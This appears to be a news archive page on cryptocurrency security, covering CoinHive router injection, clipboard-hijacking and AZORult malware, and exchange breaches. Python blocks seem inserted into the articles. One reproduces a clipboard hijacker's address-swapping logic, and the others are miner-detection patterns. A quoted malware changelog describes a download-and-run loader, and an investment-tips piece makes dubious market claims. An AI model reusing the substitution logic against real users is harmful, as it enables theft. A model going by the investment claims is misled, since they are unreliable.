Category Archives: cryptocurrency

Naked Security – Sophos: How a cryptocurrency-destroying bug almost didn’t get reported

A researcher recently revealed how he found a bug that could have brought the fourth largest cryptocurrency to its knees – and how he was almost unable to report it.

Does the future of cryptocurrency lie in each country having its own?

Cryptocurrencies have undoubtedly proven their credentials as a pioneering and disruptive innovation. In 2017, the world sat up and took notice as Bitcoin ballooned from below US$1,000 to almost US$20,000 – with plenty of rises and falls along the way – in a crazy 12 months that captured headlines worldwide.

Whether you were gripped by this exciting 'new' asset and are still working out how to trade it, or are concerned about what it means for the established system of currencies and payments, what happens next matters.

The challenges faced by cryptocurrency

Perhaps inevitably, the rise of cryptocurrencies such as Bitcoin has led to challenges. Firstly, there are a lot of people with vested interests in the existing system that have been left red-faced by the rise of an asset that is free from regulation by central banks.

On top of that, the strengths of cryptocurrencies have been exploited by people engaged in criminal activity. People engaged in the sale of illegal goods have been attracted by the privacy and anonymity offered, while scammers have jumped on the opportunity to create or worsen volatility to make quick money.

A combination of all of these factors has led regulators in places such as South Korea to introduce rules on the way cryptocurrencies are bought and used.

Location-based solutions

If nations and regions impose rules and regulations on the likes of Bitcoin, will this spell trouble for the long-term future of cryptocurrencies? Not necessarily. The blockchain technology involved in digital payment formats is widely seen as having great potential to help speed up the transfer of money and help payments to be safe and secure.

One way of harnessing the essence of cryptocurrencies, while still maintaining a sense of control, is for states, cities or regions to establish their own. New rivals to Bitcoin are springing up all the time, but recently some of them have taken on a geographic flavour.

Over in South Korea, for example, Seoul City has announced plans to unveil S-Coin, a cryptocurrency that could be used in welfare programmes around the city.

Back at the end of last year, Dubai's government launched the blockchain-based emCash currency. Through its emWallet payment system, people can use it to pay for everything from 'their daily coffee and children's school fee to utility charges and money transfers' using near-field communication.

Dubai Economy deputy director general Ali Ibrahim said: “A digital currency has varied advantages – faster processing, improved delivery time, less complexity and cost, to name a few. It will change the way people live and do business in Dubai, and mark a giant leap for the city in harnessing game-changing innovations to improve ease of business and quality of life.”

Cryptocurrencies are ‘an experiment’

As with anything to do with cryptocurrencies, however, it remains to be seen how this will develop.

Singapore’s central bank has vowed to keep a close eye on developments elsewhere – weighing up the risks and success of the regulation drawn up in reaction to them.

In a written answer to a question from politicians on banning the trading of cryptocurrency, Deputy Prime Minister Tharman Shanmugaratnam said: “Cryptocurrencies are an experiment. The number and different forms of cryptocurrencies is growing internationally. It is too early to say if they will succeed. If some do succeed, their full implications will also not be known for some time.”

He added: “The Monetary Authority of Singapore (MAS) has been closely studying these developments and the potential risks they pose. As of now, there is no strong case to ban cryptocurrency trading here.”

Don’t ignore the power of Bitcoin

It remains to be seen whether or not location-specific cryptocurrencies can take off. While they might have the support of central banks and governments, the cryptocurrency movement so far has been defined by the hopes and wishes of the users. If they show an appetite to use Bitcoin or similar rivals then it will be difficult to knock this off its perch.

Bitcoin has established itself as the market leader and might well weather the storm of scams and regulations. In fact, these might just serve to help to legitimize the sector in the eyes of those who are still wary of this type of asset.

Twitter CEO Jack Dorsey believes that Bitcoin will become a dominant currency over the next decade.

Dorsey, who is also chief executive of crypto-friendly mobile payment firm Square, recently said: “The world ultimately will have a single currency, the internet will have a single currency. I personally believe that it will be bitcoin… probably over ten years, but it could go faster.”

Whether country-, city- or region-specific cryptocurrencies take off or not, they are clearly one of the many ways in which people are trying to shape the future of this fast-changing market, and they are especially attractive to politicians and central banks who would like to establish a sense of control over where the sector heads.

The post Does the future of cryptocurrency lie in each country having its own? appeared first on TechWorm.

Cyber Criminals selling Bitcoin ATM Malware on Dark Web

By Uzair Amir

Trend Micro researchers have discovered a listing on a dark web marketplace for malware that lets attackers steal from Bitcoin ATMs, raking in cryptocurrency worth 6,750 in euros, pounds or dollars per attack. The listing appears to have been created on June 25, 2018, and carries a whopping price tag of $25,000. […]

Read the original post: Cyber Criminals selling Bitcoin ATM Malware on Dark Web

Massive Router Attack Injects CoinHive Malware Using Winbox Bug

Security researchers observed a massive router attack in which threat actors injected CoinHive into more than 170,000 devices to mine for Monero.

On July 31, security firm Trustwave detected a substantial CoinHive uptick in Brazil and, on further investigation, identified MikroTik routers as the infection point. By exploiting CVE-2018-14847, a critical flaw in the routers' Winbox management service, attackers read sensitive files from target devices, including stored credentials, and then gained unauthenticated remote admin access. That access let them inject the CoinHive script, which hijacks the CPU of any browser that loads it to mine Monero for the attacker.

Although the majority of infected devices are in Brazil, this router attack is gaining ground internationally, according to the report.

The Impact of Malicious Miners

Crypto-mining malware eats up system resources, which degrades performance, and an injected miner is also a sign that the device serving it has already been compromised. For this attack, the threat actors targeted carrier-grade routers that serve global industries and internet service providers (ISPs), increasing their reach and making it difficult for security teams to eliminate all CoinHive instances.

According to Trustwave, this impacts “users who are not directly connected to the infected router’s network,” as well as those who “visit websites behind these infected routers.”

As the campaign spread worldwide, researchers discovered a placeholder script (u113.src) and a backdoor account (called “ftu”) that allows attackers to send additional commands to any compromised device. Given the sheer number of devices impacted, the campaign could easily shift from simple crypto-mining to ransomware or complete network compromise.

How to Mitigate the Risk of a Router Attack

Although MikroTik released a fix for the flaw in April 2018, Trustwave noted that “there are hundreds of thousands of unpatched (and thus vulnerable) devices still out there.”

To limit the risk from vulnerabilities like the Winbox bug, IBM Security experts recommend strict patch management policies and giving router logs proper priority in security information and event management (SIEM) tooling, so that routers don't get lost in the mix. Routers may go several days without sending a log, so it's important to review what they do send regularly to ensure that CoinHive or other malware hasn't set up shop.

Mitigating the impact of cryptojacking malware also requires a more active and decisive approach to risk management. Given the rapid spread of coin-mining tools, security experts advise organizations to reevaluate potential areas of risk, the impact of a compromise and its potential long-term effects in order to create an actionable risk mitigation plan.

Sources: Trustwave, MikroTik

The post Massive Router Attack Injects CoinHive Malware Using Winbox Bug appeared first on Security Intelligence.

E Hacking News – Latest Hacker News and IT Security News: A New Malicious Campaign Whip Around $60,000 of Bitcoin

In July 2018, FortiGuard Labs reported a newly discovered malicious campaign. The campaign, dubbed "Bitcoin Stealer", is so far held responsible for stealing roughly $60,000 worth of Bitcoin.

FortiGuard researchers first came across the threat in April 2018, when it matched several detection rules specific to the Jigsaw ransomware. On closer inspection, however, the sample, whose assembly name was "BitcoinStealer.exe", did not behave like ransomware at all.

Instead, Bitcoin Stealer uses an executable that monitors the infected PC's clipboard for anything resembling a bitcoin address. When it finds one, the malware replaces the copied address with one of its own that shares the same leading and trailing characters as the original.

In this way the malware inserts itself directly into bitcoin transactions and tricks users, who typically glance only at the start and end of an address, into sending cryptocurrency to the criminal's wallet.

As Techopedia notes, such stealers are a form of clipboard hijacking, an attack in which the attacker alters clipboard contents, often to redirect browser users to a malicious website. Attackers are also known to use a related technique called "pastejacking", which tampers with commands copied from a web browser before they are pasted into a terminal.

The question now facing security specialists is whether adequate protection exists against clipboard modification attacks, given that attackers have a long history of targeting clipboards to steal cryptocurrency or redirect users to malware.
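The substitution trick described above is worth seeing end to end. The following is an added example and not FortiGuard's code or anything recovered from the Bitcoin Stealer sample: it simulates the malware's decision (swap the clipboard only when it holds a syntactically valid legacy bitcoin address), shows how an attacker picks the lookalike from a pool by matching leading and trailing characters, and gives the defender's check, a full comparison that reports where the pasted string first diverges. The attacker pool consists of constructed strings in the Base58 alphabet, not real addresses; the victim's address is Satoshi's well-known genesis address, which does pass the Base58Check checksum. A real attacker pool would be vanity-generated addresses that also pass the checksum, so checksum validity is no defence against substitution, only against corruption; the defence is comparing the whole string against the source.

```python
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy (Base58Check) Bitcoin address: version character '1' or '3', 25-34 chars total.
LEGACY_ADDR_RE = re.compile(r"^[13][" + B58_ALPHABET + r"]{24,33}$")


def base58check_valid(addr):
    """True if `addr` decodes to payload||checksum with a correct double-SHA256 checksum."""
    num = 0
    for ch in addr:
        if ch not in B58_ALPHABET:
            return False
        num = num * 58 + B58_ALPHABET.index(ch)
    body = num.to_bytes((num.bit_length() + 7) // 8, "big")
    # Each leading '1' encodes a leading zero byte that the integer form drops.
    raw = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + body
    if len(raw) < 5:
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def looks_like_btc_address(text):
    text = text.strip()
    return bool(LEGACY_ADDR_RE.match(text)) and base58check_valid(text)


def _common_prefix_len(a, b):
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def pick_lookalike(victim_addr, pool):
    """Attacker side: choose the pool address sharing the most leading and
    trailing characters with the victim's address, since those are the only
    characters most users ever compare."""
    def score(candidate):
        return (_common_prefix_len(victim_addr, candidate)
                + _common_prefix_len(victim_addr[::-1], candidate[::-1]))
    return max(pool, key=score)


def hijack_clipboard(clipboard_text, pool):
    """Simulates the malware's decision: swap only content that is a real-looking address."""
    if looks_like_btc_address(clipboard_text):
        return pick_lookalike(clipboard_text.strip(), pool)
    return clipboard_text


def first_difference(intended, pasted):
    """Defender side: index of the first differing character, or -1 if identical.
    A swap typically shows up in the middle of the string, exactly where nobody looks."""
    for i, (x, y) in enumerate(zip(intended, pasted)):
        if x != y:
            return i
    return -1 if len(intended) == len(pasted) else min(len(intended), len(pasted))


# Real, well-known valid address (the genesis block coinbase), used as the victim's address.
GENESIS_ADDR = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"

# Constructed attacker pool: Base58 alphabet only, NOT real addresses and not checksum-valid.
ATTACKER_POOL = [
    "1Bv3Ht8RqWn6ZyUcXe9JdPkMsLaVfTb2Qz",
    "1A1zQkR3u2m9Wx7YbJcTnV5dHsLpEq4fNa",  # shares "1A1z" and "fNa" with the victim
    "1A1zHyT4sDq8WkR2mNcXvJ6bLp9ZeUgcaN",
]

if __name__ == "__main__":
    swapped = hijack_clipboard(GENESIS_ADDR, ATTACKER_POOL)
    print("copied :", GENESIS_ADDR)
    print("pasted :", swapped)
    print("first differing index:", first_difference(GENESIS_ADDR, swapped))
```

Running the block shows the swapped address differing only from the fifth character onward while the first four and last three characters match, which is why the "check both ends" habit fails and why wallets that display the full destination on a second device are the practical defence.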

HOTforSecurity: No cryptocurrency exchange can fully guarantee security, researchers say

2017 saw many risk-takers rack up small fortunes by riding the Bitcoin wave, but some ended up in tears — their accounts hacked and their crypto-wallets emptied. While you might be tempted to blame the wallet’s owner for such a mishap, it’s not that simple.

An investigation into two years’ worth of data leaks from cryptocurrency exchanges reveals that hackers aren’t exactly having a hard time hacking into cryptocurrency exchange services. A good example was the case in June of South Korea’s Coinrail, which lost about £28 million / $36 million to hackers. Crypto-fans might remember that the cyber-attack instantly sent the price of Bitcoin tumbling 10%.

Group-IB has found that, from 2016 to 2017, the number of cryptocurrency-related data leaks soared by 369%, while the first month of 2018 set a record.

“Due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average,” researchers said.

The USA, Russia and China are the primary targets, and every third victim of the attack is an American. The US also hosts 56.1% of criminal C&C servers belonging to cryptocurrency hackers, followed by the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

Attackers use techniques ranging from simple social engineering to more sophisticated trojan deployments, leveraging tools such as AZORult, Pony Formgrabber and Qbot. Cybercrooks are also repurposing tools previously used in attacks on banks.

So, why are cryptocurrency exchanges such sitting ducks?

The answer, according to researchers, is simpler than one might like to believe: “disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.”

Analyzing 720 accounts, Group-IB found that one in five uses a password shorter than 8 characters – a dangerous practice, considering how successful brute force attacks can be against weak passwords.

After analyzing circumstances of other exchanges that got hacked – including Bitfinex, Bithumb, Bitstamp, HitBTC, and Poloniex – researchers drew the following conclusion:

“Currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users.”

This chilling conclusion alone should send shivers down the spines of those who sold valuable possessions to hop on the Bitcoin bandwagon, or at least prompt them to set a stronger password.

Other attack vectors identified by the researchers included errors in the software's source code, phishing attacks, unauthorized access to the user database, and vulnerabilities in the storage and withdrawal of funds.

“However, all of them stem from the lack of attention to information security and protection of digital assets,” researchers emphasized.

As far as crypto-exchanges are concerned, considering the kind of business they run and how a breach can affect their customers’ lives, two-factor authentication should be the absolute minimum level of protection for customer accounts. Unfortunately, not all of them enforce this practice, the research revealed.


Update MikroTik routers – 170,000 devices hit by cryptocurrency malware

By Waqas

Currently, the malware is targeting unpatched MikroTik routers in Brazil, but researchers believe it is only a matter of time before it spreads worldwide. Unpatched routers manufactured by MikroTik have become targets of cryptojacking malware campaigns in Brazil. According to analysis by Trustwave security researcher Simon Kenin, an unprecedented increase in web-based cryptojacking/cryptomining attacks in Brazil has […]

Read the original post: Update MikroTik routers – 170,000 devices hit by cryptocurrency malware

Users Played by Cryptojacking Scam on Popular Gaming Platform

A new cryptojacking scam masquerading as a video game garnered 6,000 downloads before being removed from the popular cloud-based platform on which it was hosted.

The game, called "Abstractism," appeared on gaming distribution platform Steam after parent company Valve adopted an "anything goes" policy for its digital store, Fortune reported in July 2018. According to Motherboard, the game was originally released in March 2018 by developer Okalo Union and its publisher as a "trivial platformer," in which players move blocks around a 2D space to the sound of soothing music.

Despite the game’s minimalist graphics and lightweight concept, users began noticing device performance issues and discovered that the program was conducting significant amounts of network communication. The developers also encouraged users to leave the game running in the background for a chance to obtain rare items. Although patch notes expressly stated that the game was not crypto-mining malware, mounting evidence to the contrary forced Steam to remove it on July 30.

Gaming Platforms Are Not All Fun and Games

The threat posed by cryptojacking scams such as Abstractism is particularly concerning for security professionals because many companies are hiring gamers to help close the IT skills gap — meaning there’s a greater chance that this type of malware could compromise business networks.

Although the game does trigger Windows Defender and antivirus alerts, its lightweight nature makes it easy to overlook these red flags — even as it hogs both central processing unit (CPU) and graphics processing unit (GPU) resources. It doesn’t take much for malware makers to create crypto-mining code — in fact, the smaller, the better.

Steam’s move to an open marketplace is also worrisome, and not just because companies will suddenly be inundated with thousands of “Abstractism” copies. With cloud-based marketplaces no longer attempting to control every piece of software they offer, the responsibility for overseeing games, productivity tools and open-source offerings has shifted to corporate IT teams.

How to Minimize the Threat of Cryptojacking

To avoid costly losses due to cryptojacking games and other malicious apps, IBM Security experts recommend implementing advanced security information and event management (SIEM) and behavioral analytics tools to detect high CPU and GPU usage.

Security experts also suggest using a managed cloud access security broker (CASB) to help mitigate the impact of shadow IT — which, in this case, could include crypto-mining games downloaded onto business devices and any other cloud-based apps that aren’t approved by IT teams.
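The "detect high CPU and GPU usage" advice above is only useful if the rule separates a miner from a legitimately busy program. The following is an added example, not IBM's or Steam's code: a streaming detector over per-process telemetry samples that flags a process only when it stays above a CPU or GPU threshold for a run of consecutive samples, so a brief spike (a level loading, a build finishing) clears the run while a background miner never lets it clear. The telemetry tuples, process names and thresholds are constructed for illustration; in practice the samples would come from an endpoint agent or the SIEM's process-metrics feed.

```python
from collections import defaultdict


def find_sustained_miners(samples, cpu_threshold=70.0, gpu_threshold=70.0, min_consecutive=5):
    """Flag processes that stay above the CPU or GPU threshold for at least
    `min_consecutive` consecutive samples.

    samples: iterable of (timestamp, process_name, cpu_pct, gpu_pct), one per
    process per collection interval. Returns {process: (first_ts, last_ts, n_samples)}
    covering the hot run that triggered the flag.
    """
    runs = defaultdict(list)   # process -> timestamps of the current uninterrupted hot run
    flagged = {}
    for ts, proc, cpu, gpu in sorted(samples):
        if cpu >= cpu_threshold or gpu >= gpu_threshold:
            runs[proc].append(ts)
            if len(runs[proc]) >= min_consecutive:
                flagged[proc] = (runs[proc][0], ts, len(runs[proc]))
        else:
            # one cool sample breaks the run; a miner never produces one
            runs[proc] = []
    return flagged


# Constructed telemetry (not real captures): ten one-minute intervals.
# The game pegs CPU and GPU the whole time; the browser spikes for two
# intervals and settles; the shell idles.
SAMPLES = []
for i in range(10):
    ts = i * 60
    SAMPLES.append((ts, "Abstractism.exe", 88.0 + (i % 3), 92.0))
    SAMPLES.append((ts, "chrome.exe", 81.0 if i in (2, 3) else 12.0, 5.0))
    SAMPLES.append((ts, "explorer.exe", 2.0, 0.0))

if __name__ == "__main__":
    for proc, (start, end, n) in find_sustained_miners(SAMPLES).items():
        print(f"{proc}: hot for {n} samples from t={start}s to t={end}s")
```

Tune `min_consecutive` to the collection interval so the window covers several minutes; the game's own advice to leave it running in the background means a miner's run will typically span hours, which no legitimate idle process does.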

Sources: Fortune, Motherboard

The post Users Played by Cryptojacking Scam on Popular Gaming Platform appeared first on Security Intelligence.

Group-IB experts record a massive surge of user data leaks from cryptocurrency exchanges

Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and analyzed the nature of these incidents.

Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, have investigated user data leaks from cryptocurrency exchanges and analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.

The USA, Russia and China are TOP-3 countries in which registered users became the victims of cyberattacks.

In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin's exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges.

January holidays for hackers: a 689% surge in the number of leaks

The report "2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis" shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.

Toolkit and infrastructure used for attacks

Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchanges users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now use them successfully to hack cryptocurrency exchanges and gain access to users' personal data.

What makes a successful attack possible?

This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.

Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).

Attack as a premonition

Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.

“Increased fraudulent activity and attention of hacker groups to the cryptoindustry, additional functionality of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signal that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires a prompt and effective response from all stakeholders, including experts in different areas.”

Recommendations of Group-IB experts to users and exchanges

In order to protect one’s funds against crypto-fraud, Group-IB recommends users to be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable the 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on the social media. For instance, users should not demonstrate the fact that they possess any cryptocurrency.

Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication obligatory for all the users and their operations, conduct regular security audits of IT infrastructure and related services, and allocate resources to training and awareness-raising concerning personnel security, starting from top management (founders) and down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing Anti-APT solutions, using Threat Intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans which will minimize potential damage.

About the Author: Group-IB Corporate Communications

Pierluigi Paganini

(Security Affairs – data leak, cryptocurrency exchanges)

The post Group-IB experts record a massive surge of user data leaks from cryptocurrency exchanges appeared first on Security Affairs.

Clever cryptojacking campaign targets MikroTik routers. If you own one, patch now!

Hackers are conducting several malware campaigns combining cryptojacking tools and vulnerable MikroTik routers. Their clever technique eliminates the need to infect individual websites with cryptojacking code; by shifting the focus onto unpatched routers they reach many more endpoints and are no longer restricted to mining from a single web page.

Researchers have discovered at least three separate campaigns, two of which have been seen unfolding in Brazil and Moldova. In total, 210,000 routers from MikroTik have been involved in the campaign.

Because hackers are leveraging a known bug in unpatched routers, they have created an entry point that enables them to mine cryptocurrency using all the computers connected to that router. Their miner of choice is (perhaps not surprisingly to some) none other than the infamous Coinhive.

Trustwave researcher Simon Kenin explains:

“The attacker created a custom error page with the CoinHive script in it [and] if a user receives an error page of any kind while web browsing, they will get this custom error page which will mine CoinHive for the attacker.”

The hack exploits a known vulnerability in the Winbox component of MikroTik routers, a flaw that was reportedly discovered in April this year and patched within a day. Numerous routers nevertheless remain unpatched, as is usually the case when applying updates depends on both the vendor and the end user.
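The custom error page Kenin describes, and the advice in the Security Intelligence piece earlier on this page to review logs until you are sure CoinHive "hasn't set up shop", both come down to recognising the same artifact in HTTP traffic. The following detector is an added example, not Trustwave's, MikroTik's or IBM's code: it scans captured response bodies for the CoinHive loader script and the site key handed to `CoinHive.Anonymous(...)`, notes when the hit sits on an error page (the injection point in this campaign), and groups hits by site key so that many unrelated hosts serving one key can be attributed to a single campaign rather than to site owners who chose to run the miner. The HTML, the site key and the hostnames are constructed samples, not real captures.

```python
import re
from collections import defaultdict

# Loader served from coinhive.com (the public miner library). Host and path
# patterns are kept loose so protocol-relative URLs and subdomains still match.
LOADER_RE = re.compile(
    r"""<script[^>]*\bsrc\s*=\s*["']?(?:https?:)?//(?:[\w.-]+\.)?coinhive\.com/lib/[^"'\s>]*""",
    re.IGNORECASE,
)
# Site key passed to the miner constructor, e.g. new CoinHive.Anonymous('KEY')
SITEKEY_RE = re.compile(
    r"""CoinHive\.(?:Anonymous|User|Token)\s*\(\s*["']([A-Za-z0-9_-]{16,64})["']"""
)


def scan_response(status, body):
    """Describe whether an HTTP response body carries a CoinHive miner.

    `status` is the HTTP status code. The MikroTik campaign injected the miner
    into the router's custom error page, so a hit on a 4xx/5xx response is
    called out separately from one on a normal page.
    """
    loader = LOADER_RE.search(body) is not None
    keys = sorted(set(SITEKEY_RE.findall(body)))
    injected = loader or bool(keys)
    return {
        "injected": injected,
        "site_keys": keys,
        "on_error_page": injected and status >= 400,
    }


def cluster_by_sitekey(captures):
    """Group (host, status, body) captures by the CoinHive site key they serve.

    One key across many unrelated hosts is the signature of mass injection;
    the attacker is paid per key, so a campaign tends to reuse one.
    """
    clusters = defaultdict(set)
    for host, status, body in captures:
        for key in scan_response(status, body)["site_keys"]:
            clusters[key].add(host)
    return {key: sorted(hosts) for key, hosts in clusters.items()}


# Constructed samples (not real captures): an injected 404 page and a clean page.
INJECTED_404 = """<html><head><title>404 Not Found</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLEKEYEXAMPLEKEYEXAMPLEKEY00');
miner.start();</script></head><body>Not Found</body></html>"""
CLEAN_200 = "<html><head><title>Welcome</title></head><body>Hello</body></html>"

if __name__ == "__main__":
    captures = [
        ("router-a.example", 404, INJECTED_404),
        ("router-b.example", 500, INJECTED_404),
        ("site.example", 200, CLEAN_200),
    ]
    print(scan_response(404, INJECTED_404))
    print(cluster_by_sitekey(captures))
```

Feed it bodies from a proxy log or a passive capture at the ISP edge rather than browsing to each router: fetching a deliberately bad URL through a suspect router returns its error page and, if injected, the miner along with it.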

IT managers and average Joes alike should install the latest MikroTik firmware as soon as possible. While cryptojacking isn't the most dangerous thing in the world, it is nonetheless a practice condemned by security experts everywhere. Plus, you never know when a known vulnerability will be exploited for more nefarious purposes, such as ransomware. In short, patch now!

Hackers Infect Over 200,000 MikroTik Routers With Crypto Mining Malware

Security researchers have discovered at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers to secretly install cryptocurrency miners on computers connected to them. In all, the malware campaigns have compromised more than 210,000 routers from Latvian network hardware provider Mikrotik across the world, with the number still increasing as of

Malware Stealing Credentials via Office Documents

Recently the threat actors in charge of the AZORult malware released a refreshed variant with upgrades on both the stealer and the downloader functionalities. This was altogether done within a day after the new version had released a dark web user AZORult in a large Email campaign to circulate the Hermes ransomware.

The new campaign with the updated adaptation of AZORult is in charge of conveying thousands of messages focusing on North America with subjects, such as, "About a role" or "Job Application" and even contains the weaponized office document "firstname.surname_resume.doc” attached to it.

Researchers said, “The recent update to AZORult includes substantial upgrades to malware that was already well-established in both the email and web-based threat landscapes.”

The attackers use password-protected documents to evade antivirus detection. Once the user enters the document password, the document prompts them to enable macros, which in turn download AZORult. The malware then contacts its C&C server from the infected machine, and the server responds with the XOR-encoded 3-byte key.

Finally, after exfiltrating stolen credentials from the infected machine, it also downloads the Hermes 2.1 ransomware.

Security analysts from Proofpoint also identified the new version (3.2) of the AZORult malware advertised on an underground forum with a full changelog.

UPD v3.2
[+] Added stealing of history from browsers (except IE and Edge)
[+] Added support for cryptocurrency wallets: Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC
[+] Improved loader. Now supports unlimited links. In the admin panel, you can specify the rules for how the loader works. For example: if there are cookies or saved passwords from, then download and run the file link[.]Com/soft.exe. Also, there is a rule “If there is data from cryptocurrency wallets” or “for all”
[+] Stealer can now use system proxies. If a proxy is installed on the system, but there is no connection through it, the stealer will try to connect directly (just in case)
[+] Reduced the load in the admin panel.
[+] Added to the admin panel a button for removing “dummies”, i.e. reports without useful information
[+] Added to the admin panel guest statistics
[+] Added to the admin panel a geobase

As the researchers note, the campaign delivers both a password stealer and ransomware, which is notable because it is uncommon to see both together. Before launching the ransomware, the stealer checks for cryptocurrency wallets and steals credentials before the files are encrypted.

New Miner – PowerGhost Fileless Cryptominer Targets Corporate Networks.

The experts at Kaspersky security lab have identified a new miner. This comes at the time when the cryptocurrency rush

New Miner – PowerGhost Fileless Cryptominer Targets Corporate Networks. on Latest Hacking News.

How a man hacked his victims’ SIM cards to steal millions of dollars

By Waqas

California authorities have arrested and charged a 20-year-old college student, Joel Ortiz, for being part of a mobile phone hijacking group that hacked SIM cards. According to reports, the detainee hijacked over 40 phone numbers and stole $5 million from high-profile targets, including cryptocurrency investors. The Boston resident Ortiz was […]


Tips for Bitcoin Investors who are New in this Field

If you are a new Bitcoin investor, you may find it quite intimidating. There are some tips which newcomers may use to maximize the chances of success. Continue reading on to find out more.

Do your research

Investors who have just started using Bitcoin should do their homework thoroughly. Remember that only by understanding it well can you know what is going on. Bitcoin offers a unique and rare opportunity, and that opportunity should be treated accordingly and wisely. It is also known as Bitcoin's underlying technology.

You should keep in mind that investing in crypto coins and tokens tends to be highly speculative. The market is mostly unregulated and unpredictable. Those who are thinking about investing here should be ready for bad outcomes, as you can lose your whole investment.

You need to know about the blockchain, i.e., the distributed ledger system which underlies all digital currencies.

Start off by taking the time to understand the blockchain properly. You need to understand how a blockchain actually stores data (such as coins) securely.

It takes time to learn about Bitcoin properly. New investors may benefit from working with a good mentor: a trusted person or resource with whom they can discuss their questions and concerns in order to understand this market.

Go forward with caution

When it comes to investment, risk is inherent. You should remember that digital currency and asset markets are two different kinds of trading systems. You have to set a completely different strategy when dealing with digital trading.

It is a high-risk area; therefore, do not invest any money that you cannot afford to lose.

It can be a good idea to begin with a small amount. Invest only a tiny fraction of your capital. Set an entry point and stick with it. With Bitcoin, one is almost always correct about the foreseeable price action; it is usually the timing that is off. Therefore, be patient and allow the Bitcoin price to come up.

When Bitcoin has reached the right price, investors should refrain from purchasing all of their Bitcoin at once. Rather, invest a little at a time, wait for a while, and then invest some more.

Diversify in an effective way

Over the last few years, Bitcoin has produced some really impressive gains, and some media outlets have run stories about "Bitcoin millionaires."

These stories may encourage investors to place all their cash in Bitcoin, but remember that it is not advisable to put all your money in one place.

When developing a diversified portfolio, you can look at altcoins as well as more traditional assets such as stocks and bonds.

When it comes to diversification, you need to build a portfolio in which a decline in one component is offset by a corresponding gain in another.

You need to know all about the Bitcoin market if you are going to be involved in it. You can also check out trading tools such as the Bitcoin Trader Test.

The post Tips for Bitcoin Investors who are New in this Field appeared first on TechWorm.

A Review of How Digital Currency Technology Operates

Bitcoin is a form of electronic currency that makes it possible for people to buy products or services and transfer funds without involving banks, creditors or any other organizations. Its origins have long been unknown, though an Australian man long rumoured to have connections to Bitcoin has come forward claiming to be its founder.

Who is this man, and how exactly does the system work?

Here is a quick look at bitcoin:

How Bitcoins Work

Bitcoin is digital money that is not linked to any financial institution or government and makes it possible for people to spend money anonymously. The coins are created by people who "mine" them by lending processing power to confirm other users' transactions. They receive bitcoins in exchange.


Bitcoins are simply lines of computer code that are digitally signed each time they move from one owner to another. Transactions can be made anonymously, which makes the currency popular with libertarians as well as technology enthusiasts, investors, and criminals.

Trade in Cash?

That is a doubtful choice. Many companies, such as the blogging service WordPress and the retailer Overstock, have jumped on the bitcoin bandwagon amid much media coverage. The leading bitcoin payment processor BitPay works with more than 58,500 businesses, as the total number of bitcoin transactions has soared to more than 250,000 per day, more than triple the figure from a year ago, according to bitcoin wallet website

Security and Safety

